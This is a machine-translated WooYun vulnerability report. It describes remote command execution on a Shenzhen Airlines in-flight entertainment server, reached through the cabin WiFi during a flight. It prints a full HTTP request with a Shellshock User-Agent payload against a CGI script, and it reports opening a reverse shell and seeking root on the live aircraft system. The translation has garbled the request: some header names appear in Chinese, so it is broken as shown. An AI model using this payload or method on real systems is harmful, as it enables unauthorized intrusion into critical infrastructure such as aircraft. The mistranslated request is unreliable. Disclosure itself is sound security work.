漏洞标题 可以控制深航的车载系统获取服务器权限 相关制造商 深圳航空 漏洞作者 Smilent 提交时间 2016-05-05 08: 41 公共时间 2016-06-19 14: 20 漏洞类型 系统/服务补丁不及时 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 漏洞详细信息 连接到机器上的WIFI后，您可以获得内联网IP 192.168.3。* 板载娱乐平台ip为192.168.3.1/192.168.2.99，有两个网卡。 发现漏洞主机，有cgi远程命令执行。您可以直接退回shell并获取服务器权限。 命令可以由UA执行 查看版本 反弹shell 发现档案 有限制，但您可以通过本地代理访问phpmyadmin等。因为飞机正在下降，空乘人员告诉我要关掉电脑，我没有再往前走了。 CentOS5.5内核的服务器版本为2.6.18-194，应该可以授权。由于时间问题，它是深入的。 漏洞证明： GET/cgi-bin/test-cgi HTTP/1.1 主机: 192.168.3.1: 8080 代理连接:保持活动状态 接受: text/html，application/xhtml + xml，application/xml; q=0.9，image/webp，*/*; q=0.8 升级 - 不安全请求: 1 用户代理:（）{忽略; }; echo Content-Type: text/plain;回声;回声;/bin/uname -a; Accept-Encoding: gzip，deflate，sdch Accept-Language: zh-CN，zh; q=0.8，en; Q=0.6 Cookie: PHPSESSID=cb49943gkbpjccfgogfjc7m8u4 修理计划： 升级bash 版权声明：请注明出处。 Smilent @乌云